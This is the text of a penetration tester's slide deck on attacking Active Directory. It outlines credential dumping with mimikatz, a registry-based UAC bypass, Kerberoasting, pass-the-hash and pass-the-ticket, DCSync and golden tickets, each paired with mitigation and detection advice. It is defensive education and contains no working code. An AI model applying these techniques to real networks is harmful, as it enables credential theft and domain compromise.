SlideShare a Scribd company logo

Attacker's Perspective of Active Directory

Sunny Neo
Sunny Neo

This document provides an overview of attack methodologies from an attacker's perspective when targeting Active Directory environments. It discusses initial access techniques, privilege escalation to domain admin rights, maintaining situational awareness through techniques like password spraying and Kerberoasting, and lateral movement tactics like pass the hash and pass the ticket. It also provides mitigation strategies and detection opportunities for defenders.

Technology
1 of 92
Download to read offline
Attacker’s Perspective of Active Directory Sunny Neo 1
whoami •Penetration Tester •Disclaimer: All opinions are all mine, not representation of the company I work for or organizations I am affiliated with •None of these materials are original. They are just a compilation of researches done by awesome people •Test all recommendations first, before implementing them. I take no liability if they mess up your environment 2
Shout Out •Sean Metcalf (@PyroTek3) for running https://adsecurity.org •Will Schroeder (@harmj0y) for developing and releasing tools for Modern Red Teaming (Empire, PowerSploit, Veil-Framework, Bloodhound) •Benjamin Delpy (@gentilkiwi) for mimikatz and continuously improving it •And Everyone else who contributed! 3
Defender’s Dilemma •Cliché •Attackers just need to win once •Defenders need to win all the time 4
Attacker’s Dilemma •The new cliché •Attackers need to evade all detection •Defenders just need one alarm/trigger to know attackers are in •“Defender's Dilemma vs Intruder's Dilemma” – TaoSecurity (2009) 5
Assume Breach Mentality •Prepare for threats beyond the WALL (Defence in Depth / Layered Defence) – CYBER RESILIENCE •Contain threats (Limit the attacker’s movement) •Detect & Respond to threats (Threat Hunting / IOC) – CYBER AGILITY •Prevention is still important but critical to move beyond it 6
Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) Source: https://attack.mitre.org/wiki/Main_Page 7 Red Team’s Tactics, Techniques and Procedures (TTPs)
Active Directory •Microsoft’s Directory Service (AD DS)– A set of services to manage network resources •Domain Controller (DC) – Server running AD DS •Domain Admin (DA) – The User Group that has full control of network resources in the Domain •Local Administrators – The User Group that has full control for Local/Specific Machine 8
Windows Authentications •NTLM Authentication • Challenge-Response Protocol •Kerberos •Single Sign On (SSO) 9
NTLM Authentication 10 Source: https://msdn.microsoft.com/en-us/library/ff647076.aspx
Kerberos Authentication 11 Source: https://msdn.microsoft.com/en-us/library/ff647076.aspx
Kerberos Authentication • Ticket Granting Ticket (TGT) contains • Privilege Attribute Certificate (PAC) stores • Account Name • Security Identifiers • Group Membership • User requests for TGT by sending timestamp that is encrypted with his secret key (NTLM Hash for RC4 cipher) • TGT is encrypted and its PAC is signed by domainKRBTGT’s secret key (NTLM Hash) – Only readable by Domain Controller (DC) • Service ticket issued by Ticket Granting Service (TGS) is encrypted by service account ’s secret key (NTLM Hash) 12
High Level Methodology Initial Foothold Privilege Escalation Situational Awareness Lateral Movement Persistence 13 *Missing Data Exfiltration
Initial Foothold •Unpatched Vulnerabilities •Spear Phishing •Weak Credentials 14
Privilege Escalation: User to Local Admin •Unpatched Vulnerabilities •System Misconfigurations • Passwords stored in SYSVOL or Group Policy Preference (GPP) •Check out Paul Craig’s talk on Local Privilege Escalation http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-p rivilege-escalation-nus-greyhats or https://pentest.blog/windows-privilege-escalation-methods-for-pent esters/ 15
Passwords stored in SYSVOL •SYSVOL • Domain-wide shared folder • Stores logon scripts, domain group policies • Any authenticated user on the domain can access it •Scripts with cleartext admin credentials stored in SYSVOL 16
Passwords stored in SYSVOL •Group Policy with Password defined for Local Administrator account 17
Passwords stored in SYSVOL •Encryption key is well known 18 Source: https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
Passwords stored in SYSVOL 19
Passwords stored in SYSVOL Mitigation & Detection •Install KB2962486 to disable new credentials from being stored in GPP and Delete existing XMLs/Group Policies •Plant a XML with “Password” in SYSVOL •Configure SACL on the XML to audit for access 20
Why do we need Local Privilege Escalation? 21
Why do we need to Privilege Escalate? •Gain access to implicit trust relationship artifacts •Assume artifacts found on one machine could be used to access other machines •More Information: http://foofus.net/goons/hinge/presos/insidious-implicit-windows-tru st-relationships.pdf 22
Dump Implicit Trust Relationship Artifacts •Dump & Crack Local Accounts’ Hashes (Hashes == Passwords) •Dump Credentials in memory •Dump Kerberos Tickets •Dump Access Tokens 23
Dump Credentials in memory (mimikatz) 24 •Single Sign On experience ☺
Dump Credentials Mitigation • Audit for misconfigurations that can lead to privilege escalation with windows-privesc-check (https://github.com/pentestmonkey/windows-privesc-check) or Powerup (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) • Install KB2871997 on Windows 7, 8, Server 2008 and 2012 • Deploy Application Whitelisting (Applocker & Device Guard) • Get rid of Windows 2003 Server • Have different trust levels for machines – Domain Admin should not log on to machines with lower Trust Level 25
Dump Credentials Detection •Monitor Registry Value for “UseLogonCredential” at HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurity ProvidersWdigest •Value: “1” to enable cleartext password to be stored in LSASS •Honey Credentials 26
Dump Credentials Detection (Not a good idea) ● Detect mimikatz in memory using Sysmon (Be careful of performance impact) ● Look for loading of ○ C:WindowsSystem32WinSCard.dll ○ C:WindowsSystem32cryptdll.dll ○ C:WindowsSystem32hid.dll ○ C:WindowsSystem32samlib.dll ○ C:WindowsSystem32vaultcli.dll ● LSA Protection Enabled - mimidrv.sys (mimikatz’s driver to turn off LSA Protection) ● More information: https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTK B_V1J5ow ← Sysmon Tutorial https://medium.com/@lennartkoopmann/explaining-and-adapting-tays-sysmon-configuration-27d9719a89a8#.c8sokq3nj https://cyberwardog.blogspot.sg/2017/03/chronicles-of-threat-hunter-hunting-for.html 27
Dump Credentials Detection 28Source https://twitter.com/markrussinovich/status/830997478182785024
Dump Credentials Detection Bypass 29 Source: https://twitter.com/raka_baraka/status/831040028436525056
User Account Control (UAC) is Enabled! •UAC is introduced since Windows Vista •Run processes as standard user rights even if user is in Administrators group unless explicit permission is given 30
UAC Bypass • Old School • Privilege File Copy (IFile Operation COM) • DLL Hijacking • Auto-elevation • New School • Fileless UAC Bypass via Registry Hijacking • Write to HKCUSoftwareClassesmscfileshell opencommand • Launch eventvwr.exe 31 • More information: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hij acking/ https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-s hould-know/
UAC Bypass Mitigation & Detection • Reduce Users with Administrator Privilege • Set UAC level to “Always Notify” instead of Default configuration (can be bypassed with Disk Clean up) • Monitor Registry entry “HKCUSoftwareClassesmscfileshellopencommand” • More information: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-di sk-cleanup/ 32
Situational Awareness • Port Scan • DNS Enumeration (SRV records, *._tcp.domain.com) • Password / Hash Spray • Service Principal Name (SPN) Scanning • Domain Enumeration & Admin Hunting • BloodHound 33
Password / Hash Spray •Quick and dirty way to identify access across the network •Good for pen test that doesn’t require stealth 34
Service Principal Name (SPN) Scanning •SPN is used to uniquely identify service instances for Kerberos Authentication •Gather services across the domain (Without a Single Port Scanned!) 35
Service Principal Name (SPN) Scanning •PowerShell scripts from Sean Metacalf https://github.com/PyroTek3/PowerShell-AD-Recon •Comprehensive List of SPN http://adsecurity.org/?page_id=183 •How SPN is used by Kerberos http://social.technet.microsoft.com/wiki/contents/articles/717.servic e-principal-names-spns-setspn-syntax-setspn-exe.aspx 36
Domain Enumeration 37
Domain Enumeration 38
Domain Enumeration with PowerView •PowerView • Based on PowerShell • Capitalize on PowerShell alternatives for “NET” command • Capitalize on Win32 API • Gain network situational awareness •More Information: https://github.com/PowerShellMafia/PowerSploit/tree/master/Reco n 39
Domain Enumeration with PowerView 40
Domain Enumeration with PowerView 41
Domain Enumeration with PowerView 42
Domain Enumeration with PowerView 43
Admin Hunting with PowerView • Implicit trust relationship • Look at where the current user has Local Administrators Right • Look for where privilege users are logged on to • Target machines with privilege users • Steal their tokens / credentials • Profit! 44
Admin Hunting with PowerView 45 • Invoke-UserHunter • Get a list of hosts from AD • Get a list of users of a specific Domain Group (Domain Admins/Local Administrators) • Run NetSessionEnum (User Sessions) and NetWkstaUserNum (Logged On Users) with information gathered • (Optionally) Check if current user has Local Administrators right on each host • More Information http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20 http://www.slideshare.net/harmj0y/i-have-the-powerview
Admin Hunting with PowerView 46Source: http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20
Admin Hunting with PowerView 47
BloodHound • Provide a graphical representation of attack path based on information gathered via customized PowerView • Simplify Admin Hunting across the Network to achieve Derivative Local Admin • More information https://wald0.com/?p=14 http://www.slideshare.net/AndyRobbins3/six-degrees-of-domain-admin-bl oodhound-at-def-con-24 https://github.com/BloodHoundAD/BloodHound/wiki 48
BloodHound 49Source: Raphael Mudge – BloodHound - Analyzing Active Directory Trust Relationships https://www.youtube.com/watch?v=gOpsLiJFI1o
Domain Enumeration Mitigation •Use Net Cease to modify NetSessionEnum default permission https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dc b5b •Upgrade to Windows 10 and Windows Server 2016 •Use SAMRi10 to restrict Remote SAM Query(>=Win 10 & Server 2016) https://www.bleepingcomputer.com/news/security/microsoft-resear chers-release-anti-reconnaissance-tool-named-samri10/ 50
Lateral Movement • Reuse cleartext credentials (Not working well after KB2871997) • Pass the Hash (Not working well after KB2871997) • Pass the Key (Overpass-the-hash) • Impersonate Tokens • Pass the Ticket • Kerberoasting 51
Pass the Hash (PtH) 52 Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
Pass the Hash (PtH) •Not working well after KB2871997 •Local accounts cannot login remotely •PtH still possible for • Default Local Administrator (RID 500) hash • Domain hashes 53
Pass the Key (Overpass the Hash) •KB2871997 stops Windows from storing cleartext credentials in memory (LSASS) •NTLM Hashes/(e)Keys are still stored in memory (SSO) •Remember how Kerberos ticket request is done? 54
Kerberos Authentication Recap 55 Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
Kerberos Authentication Recap 56
Pass the Key (Overpass the Hash) •User’s secret key is dependent on the cipher used •Exploit Steps • Privilege Escalate to Local Admin • Dump Hashes/(e)Keys • Create a new process and Inject stolen hash/(e)key into memory • SSO will refer to the Injected secret key in memory • Impersonate Token of newly created Process • Win! 57
Pass the Key (Overpass the Hash) 58 •User “labgg” is Domain Admin logged in on Compromised Machine
Pass the Key (Overpass the Hash) 59
Pass the Key (Overpass the Hash) 60 •Some bug with Empire’s “shell” command so switched it to Meterpreter
Pass the Key (Overpass the Hash) 61 More Information: http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/ http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
Pass the Ticket •Export Ticket-Granting-Ticket (TGT) from memory of a compromised Host •Import the TGT into Attacker’s Machine •Profit! 62
Pass the Ticket with MS14-068 •MS014-068 • Privilege escalation for Authenticated Domain User to Domain Admin by forging PAC • PAC stores Authorization Data (Group Membership, Security Identifier) • Improper validation of the Privilege Attribute Certificate (PAC) Signature 63
Pass the Ticket with MS14-068 64 More Information: https://labs.mwrinfosecurity.com/blog/digging-into-ms14-068-exploitation-and-defence/ https://www.trustedsec.com/december-2014/ms14-068-full-compromise-step-step/ https://github.com/bidord/pykek/
Pass the Ticket with MS14-068 65
Kerberoasting •Service Ticket can be obtained without actually using it •Service Ticket issued by TGS is encrypted with target service’s account secret key •Service Accounts are usually privilege accounts on the domain 66
Kerberoasting •Why not just crack it? • Offline Attack without contacting the Target Service’s Machine 67 Source: https://adsecurity.org/?p=2293
Kerberoasting 68 More Information: http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/ https://room362.com/post/2016/kerberoast-pt3/
Kerberoasting 69
Kerberoasting Mitigation •Use password with >=25 characters for Service Accounts •Use Managed Service Accounts •More Information: https://adsecurity.org/?p=2293 https://technet.microsoft.com/en-us/library/dd548356(v=ws.10).aspx 70
Kerberoasting Detection •Audit “Audit Kerberos Service Ticket Operations” on Success •Look for Event 4769 and Ticket Option: 0x40810000 and Ticket Encryption type: RC4 (0x17/0x18) •Create Honey Service ☺ •More information: https://adsecurity.org/?p=3458 https://adsecurity.org/?p=3513 71
Lateral Movement Mitigation • Deploy Microsoft LAPS on Servers and Workstations to manage Local Administrator Passwords • Deploy Group Policy: “Deny access to this computer from the network” & “Deny log on through Remote Desktop Services” for “Local account and member of Administrators group” or “*S-1-5-114” [Block RID 500 accounts] • Add Users with High Privileges to “Protected User” Group if possible • Network Segmentation – It’s always about the Trust Path • Restrict Workstation to Workstation Communication with GPO – Windows Firewall • More Information: https://adsecurity.org/?p=3299 https://adsecurity.org/?p=3377 https://technet.microsoft.com/en-us/library/dn466518.aspx 72
Lateral Movement Mitigation • Different Tiers of Administrators for Different Tiers of Servers & Workstations 73 More Information: https://technet.microsoft.com/en-us/library/mt631193.aspx
Lateral Movement Detection •Turn on Audit for Local Account Logon •Turn on Audit for Kerberos • Look out for Domain Names in lower case/non-standard (Not comprehensive) • Look out for Ticket Encryption Type 0x17/0x18 for RC4 (Not comprehensive) •More Information: https://dfir-blog.com/2015/12/13/protecting-windows-networks-ker beros-attacks/ https://dfir-blog.com/2016/03/13/how-to-parse-windows-eventlog/ 74
Persistence •Hash Dump & Crack the Hashes •Golden Ticket •Silver Ticket 75
Hash Dump & Crack The Hashes •Old School • Get NTDS.dit file • Backup • Virtual Machine Disk • Shadow Volume • Process NTDS.dit for Hashes •New School • DCSync (No need for direct access to NTDS.dit) 76
DCSync •Impersonate as a Domain Controller •Replicate User Credentials via Directory Replication Service (DRS) Remote Protocol •No Code Execution required, however “Domain Admins” privilege is needed •If used with “Domain Controllers” privilege, it will not be logged 77
DCSync 78
Golden Ticket • Forged TGT with Admin Privilege, then PTT • TGT is encrypted & signed by • Domain KRBTGT’s secret key • Important to note that KRBTGT’s password is almost never changed • Information required to create Golden Ticket • Domain Name • Domain SID • Domain KRBTGT NTLM Hash/(e)Keys • UserID for Impersonation 79
Golden Ticket 80
Golden Ticket 81
Golden Ticket 82 More Information: https://blog.didierstevens.com/2016/08/12/mimikatz-golden-ticket-dcsync/ http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
Silver Ticket •Forged Service Ticket •Require only the service account key instead of KRBTGT •Access is restricted to the specific Service •More Information: https://adsecurity.org/?p=2011 83
Silver Ticket 84
Silver Ticket 85
Persistence Mitigation and Detection •Change KRBTGT’s password twice (to purge Password History) and regularly •Look out for RC4 Kerberos traffic – Vista and onwards default cipher for Kerberos is AES (Not comprehensive) •Use Group Managed Service Account •More information: https://adsecurity.org/?p=1515 86
Mitigations for PowerShell Activities ● Lock down PowerShell.exe, PowerShell_ISE.exe (Not Ideal) ● Uninstall PowerShell v2 ● Use PowerShell v5 with ○ Constrained Language Mode with AppLocker / Device Guard ○ Log all PowerShell Activities (Module Logging, Script Block Logging, System-wide Transcript Logging) ● More information: https://adsecurity.org/?p=2604 87
Microsoft Advanced Threat Analytics (ATA) • Machine Learning Platform to detect quite a number of things we have discussed • Receive logs and events from SIEM and Windows Event Forwarding(WEF) • More information: https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-expl ore/ata-threats https://adsecurity.org/?p=1583 https://gallery.technet.microsoft.com/Advanced-Threat-Analytics-8b0a86bc/fi le/169608/1/ATA%20Playbook.pdf 88
Microsoft Advanced Threat Analytics 89 Source: https://blogs.technet.microsoft.com/enterprisemobility/2015/05/04/microsoft-advanced-threat-analytics-public-preview-releas e-is-now-available/
Q & A? 90
Reference • Adversarial Tactics, Techniques & Common Knowledge https://attack.mitre.org/wiki/Main_Page • Attack Methods for Gaining Domain Admin Rights in Active Directory https://adsecurity.org/?p=2362 • PROTECTING WINDOWS NETWORKS – KERBEROS ATTACKS https://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/ • The Most Common Active Directory Security Issues and What You Can Do to Fix Them https://adsecurity.org/?p=1684 • Building an Empire with PowerShell http://www.slideshare.net/harmj0y/building-an-empire-with-powershell 91
Reference • Mimikatz and DCSync and ExtraSids, Oh My http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ • Make PowerView Great Again http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ • Six Degree of Domain Admin https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Robbins-Vazarkar-Schroeder-Six- Degrees-of-Domain-Admin.pdf • kerberos, kerberoast and golden tickets https://leonjza.github.io/blog/2016/01/09/kerberos-kerberoast-and-golden-tickets/ • Mimikatz 2.0 - Silver Ticket Walkthrough https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html#Why 92

Recommended

Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory Enumeration
Daniel López Jiménez
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins
 

Recommended

Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory Enumeration
Daniel López Jiménez
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
RootedCON
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
Will Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE - ATT&CKcon
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
⭕Alexander Rymdeko-Harvey
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
Douglas Bienstock
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
Digit Oktavianto
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
FaithWestdorp
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 

More Related Content

What's hot

Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
RootedCON
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
Will Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE - ATT&CKcon
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
⭕Alexander Rymdeko-Harvey
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
Douglas Bienstock
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
Digit Oktavianto
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 

What's hot (20)

Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
